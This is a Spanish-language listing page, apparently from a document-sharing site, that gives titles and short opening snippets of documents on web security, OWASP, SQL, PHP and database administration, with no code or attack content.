WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

OpenProdoc. ECM Open Source

OpenProdoc. ECM Open Source OpenProdoc ECM Open Source Índice Visión General Arquitectura Funciones Seguridad Administración Requerimientos Evolución Visión General OpenProdoc es un gestor documental de código abierto. Cuenta con

Más detalles

Tema 33. El lenguaje SQL

Tema 33. El lenguaje SQL Tema 33. El lenguaje SQL Introducción... 1 Modos de uso... 2 Ejecución de las sentencias SQL... 2 Instrucciones DDL Data Definition Language-... 3 Instrucciones DML Data Manipulation Language-... 4 Instrucciones

Más detalles

Un comité de la organización ANSI (American National Standards Institute) aborda la problemática del almacenamiento de datos para su procesamiento en

Un comité de la organización ANSI (American National Standards Institute) aborda la problemática del almacenamiento de datos para su procesamiento en 15/05/2012 1 Un comité de la organización ANSI (American National Standards Institute) aborda la problemática del almacenamiento de datos para su procesamiento en aplicaciones informáticas en 1975. 2 Como

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Solución al Reto Hacking v2.0 de Informática 64

Solución al Reto Hacking v2.0 de Informática 64 Febrero 2007 Introducción Este documento describe dos soluciones posibles al segundo Reto Hacking de Informática 64 que se publicó el 10 de febrero de 2007 en la siguiente dirección web: http://retohacking2.elladodelmal.com

Más detalles

Bases de datos: Sistemas de bases de datos:

Bases de datos: Sistemas de bases de datos: Bases de datos: Sistemas de bases de datos: Un sistema de bases de datos es básicamente un sistema para archivar en computador, es decir, es un sistema computarizado cuyo propósito general es mantener

Más detalles

Universidad Ricardo Palma

Universidad Ricardo Palma Universidad Ricardo Palma FACULTAD DE INGENIERÍA ESCUELA ACADÉMICO PROFESIONAL DE INGENIERÍA INFORMATICA DEPARTAMENTO ACADÉMICO DE INGENIERÍA SÍLABO PLAN DE ESTUDIOS 2006-II SÍLABO I DATOS ADMINISTRATIVOS

Más detalles

MAESTRO DE PHP PHP NIVEL 1

MAESTRO DE PHP PHP NIVEL 1 MAESTRO DE PHP MAESTRO DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks. Incluye los Cursos PHP Nivel 1 y PHP Avanzado

Más detalles

Guía práctica PHP 6. (c) Francisco Charte Ojeda

Guía práctica PHP 6. (c) Francisco Charte Ojeda Guía práctica PHP 6 Agradecimientos Sobre el autor (c) Francisco Charte Ojeda Introducción Páginas de servidor PHP Creación de páginas PHP Cómo usar este libro Convenciones tipográficas 1. Instalación

Más detalles

CURSO DE PROGRAMACIÓN PHP MySQL

CURSO DE PROGRAMACIÓN PHP MySQL CURSO DE PROGRAMACIÓN PHP MySQL MASTER EN PHP MÓDULO NIVEL BASICO PRIMER MES Aprende a crear Sitios Web Dinámicos con PHP y MySQL 1. Introducción Qué es PHP? Historia Por qué PHP? Temas de instalación

Más detalles

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante MÁSTER UNIVERSITARIO EN INGENIERÍA WEB Datos Descriptivos Guía de Aprendizaje Información al estudiante Escuela Técnica Superior de Ingeniería de Sistemas Centro responsable Informáticos Titulación: Máster

Más detalles

Recomendaciones de Seguridad para Web sites implementados bajo Joomla!

Recomendaciones de Seguridad para Web sites implementados bajo Joomla! Recomendaciones de Seguridad para Web sites implementados bajo Joomla! Dirigido a: Secretarías de Educación que hacen uso del servicio de Web Hosting proporcionado por el Ministerio de Educación Nacional

Más detalles

Optimización de Inyecciones SQL

Optimización de Inyecciones SQL Optimización de Inyecciones SQL Cesar Neira Estudiante de Ing. de Sistemas UNMSM http://alguienenlafisi.blogspot.com csar.1603@gmail.com OWASP LATAM TOUR 2012 The OWASP Foundation http://www.owasp.org

Más detalles

Sitios y programas recomendados

Sitios y programas recomendados WEB HACKING 1 Sitios y programas recomendados A continuación encontraremos un listado de sitios web relacionados con las temáticas expuestas en el libro, junto a una serie de programas que brindan herramientas

Más detalles

UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN

UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN CICLO: 02/2013 GUIA DE LABORATORIO #1 Nombre de la Práctica: Adquisición de servicio webhosting Lugar de Ejecución: Centro

Más detalles

Aplicaciones seguras con ClaseSeguridad

Aplicaciones seguras con ClaseSeguridad Aplicaciones seguras con ClaseSeguridad Índice de contenido Por que ClaseSeguridad?...1 Referenciar ClaseSeguridad...1 Declaración y creación...1 Evitar inyección de SQL...1 Eliminar etiquetas...3 Evitar

Más detalles

Offensive State Auditoría de Aplicaciones Web

Offensive State Auditoría de Aplicaciones Web Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4

Más detalles

Securiza tu red con Snort y sus amigos

Securiza tu red con Snort y sus amigos www.securityartwork.es www.s2grupo.es Securiza tu red con Snort y sus amigos José Luis Chica Uribe Técnico de seguridad IT jchica@s2grupo.es Índice Seguridad: conceptos Tipos de ataques Cómo defenderse?

Más detalles

Administración de Sistemas Gestores de Bases de Datos

Administración de Sistemas Gestores de Bases de Datos Administración de Sistemas Gestores de Bases de Datos UD 2: Auditorías en el SGBD Oracle Félix Reyes Fernández Índice Conceptos Tipos de auditorías Registros de auditorías Vistas de auditorías Gestión

Más detalles

Desarrollo de Aplicaciones con Tecnologías Web

Desarrollo de Aplicaciones con Tecnologías Web Desarrollo de Aplicaciones con Tecnologías Web Código: Modalidad: Distancia Duración: 100 Horas. Objetivos: La presente formación se ajusta al itinerario formativo del Certificado de Profesionalidad IFCD0210

Más detalles

Apuntes de la Unidad 1 de Base de Datos

Apuntes de la Unidad 1 de Base de Datos DEFINICIÓN DE BASE DE DATOS.- Base de Datos es un conjunto de datos relacionados entre sðy que tienen un significado implðcito. En un sistema de información se cuenta con dos enfoques principales para

Más detalles

ADMINISTRACION DE BASES DE DATOS EN ORACLE

ADMINISTRACION DE BASES DE DATOS EN ORACLE SQL LENGUAJE ESTRUCTURADO DE CONSULTA El nacimiento del lenguaje SQL data de 1970 cuando E. F. Codd publica su libro: "Un modelo de datos relacional para grandes bancos de datos compartidos". Ese libro

Más detalles

2.6.2.- Aplicaciones de las vistas. 2.6.1.- Concepto de vista. 2.6.3.- Vistas en SQL. 2.6.3.- Vistas en SQL.

2.6.2.- Aplicaciones de las vistas. 2.6.1.- Concepto de vista. 2.6.3.- Vistas en SQL. 2.6.3.- Vistas en SQL. 2.6.1.- Concepto de vista. Una vista es una tabla derivada de otras tablas (básicas o virtuales). Una vista se caracteriza porque: Se considera que forma parte del esquema externo. Una vista es una tabla

Más detalles

Unidad 9:GESTIÓN Y ALMACENAMIENTO DE LA INFORMACIÓN EN FORMATOS XML

Unidad 9:GESTIÓN Y ALMACENAMIENTO DE LA INFORMACIÓN EN FORMATOS XML Unidad 9:GESTIÓN Y ALMACENAMIENTO DE LA INFORMACIÓN EN FORMATOS XML JJ Taboada León IES San Sebastián, Departamento de Informática LENGUAJE DE MARCAS Y SGI Curso 2012 / 2013 XML PARA EL ALMACENAMIENTO

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

BASES DE DATOS - SQL. Javier Enciso

BASES DE DATOS - SQL. Javier Enciso BASES DE DATOS - SQL Javier Enciso AGENDA Conceptos Básicos de Bases de Datos Manejo de Bases de Datos y Tablas SQL Inserción, Actualización y Borrado Consultas usando SELECT AGENDA Conceptos Básicos de

Más detalles

LENGUAJE SQL. En Mysql se utiliza un subconjunto de SQL (update, insert into, delete, select, truncate,etc).

LENGUAJE SQL. En Mysql se utiliza un subconjunto de SQL (update, insert into, delete, select, truncate,etc). LENGUAJE SQL Un manejador de base de datos debe de contener lenguajes que permitan definir el modelos de los datos, este mismo es que permite crear la estructura de la base de datos. Lenguaje de Definicion

Más detalles

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del

Más detalles

INSTITUTO TECNOLÓGICO SUPERIOR DE ESCÁRCEGA INGENIERÍA EN SISTEMAS COMPUTACIONALES MATERIA: TALLER DE BASE DE DATOS TRABAJO: PROFESOR:

INSTITUTO TECNOLÓGICO SUPERIOR DE ESCÁRCEGA INGENIERÍA EN SISTEMAS COMPUTACIONALES MATERIA: TALLER DE BASE DE DATOS TRABAJO: PROFESOR: INSTITUTO TECNOLÓGICO SUPERIOR DE ESCÁRCEGA INGENIERÍA EN SISTEMAS COMPUTACIONALES MATERIA: TALLER DE BASE DE DATOS TRABAJO: SENTENCIA GENERICA DE CREATE PROFESOR: FRANCISCO SALVADOR BALLINA SANCHEZ ALUMNO:

Más detalles

Utilización del programa de Orabench Versión 9.2.0 para Migración. Describir los pasos para la utilización del programa Orabench 9.2.0 de Oracle.

Utilización del programa de Orabench Versión 9.2.0 para Migración. Describir los pasos para la utilización del programa Orabench 9.2.0 de Oracle. Página 1 de 15 1. Objetivo y Alcance Describir los pasos para la utilización del programa Orabench 9.2.0 de Oracle. Comprende la utilización del Programa Orabench de Oracle. 2 Responsable El responsable

Más detalles

Aplicaciones Web (Curso 2015/2016)

Aplicaciones Web (Curso 2015/2016) Seguridad en Aplicaciones Web Aplicaciones Web (Curso 2015/2016) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.

Más detalles

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa

Más detalles

3 Consultas y subconsultas

3 Consultas y subconsultas 3 Consultas y subconsultas En SQL, la sentencia SELECT permite escribir una consulta o requerimiento de acceso a datos almacenados en una base de datos relacional. Dichas consultas SQL van desde una operación

Más detalles

3ra. Parte. Bases de Datos Relacionales

3ra. Parte. Bases de Datos Relacionales 3ra. Parte Bases de Datos Relacionales Lenguaje de consulta SQL Proyección Tabla 1 Selección Tabla 1 Tabla 1 Tabla 2 Unión Lenguaje SQL SELECT SELECT [TOP expresión [PERCENT] [ WITH TIES ] ]

Más detalles

Oracle Express 10g. Marta Zorrilla Universidad de Cantabria

Oracle Express 10g. Marta Zorrilla Universidad de Cantabria Oracle Express 10g Marta Zorrilla Universidad de Cantabria Características With Oracle Database XE, you use an intuitive browser-based interface to: Administer the database Create tables, views, and other

Más detalles

BASE DE DATOS UNIVERSIDAD DE LOS ANDES FACULTAD DE MEDICINA T.S.U. EN ESTADISTICA DE SALUD CATEDRA DE COMPUTACIÓN II. Comenzar presentación

BASE DE DATOS UNIVERSIDAD DE LOS ANDES FACULTAD DE MEDICINA T.S.U. EN ESTADISTICA DE SALUD CATEDRA DE COMPUTACIÓN II. Comenzar presentación UNIVERSIDAD DE LOS ANDES FACULTAD DE MEDICINA T.S.U. EN ESTADISTICA DE SALUD CATEDRA DE COMPUTACIÓN II BASE DE DATOS Comenzar presentación Base de datos Una base de datos (BD) o banco de datos es un conjunto

Más detalles

Sistemas de Datos Curso: Ernesto Chinkes. Subconsultas Stored Procedures - Triggers

Sistemas de Datos Curso: Ernesto Chinkes. Subconsultas Stored Procedures - Triggers Subconsultas Stored Procedures - Triggers Subconsultas Concepto Ubicación En el SELECT En el FROM En el WHERE Operadores IN ANY-ALL EXISTS Concepto Son sentencias SELECT que aparecen dentro de otra consulta

Más detalles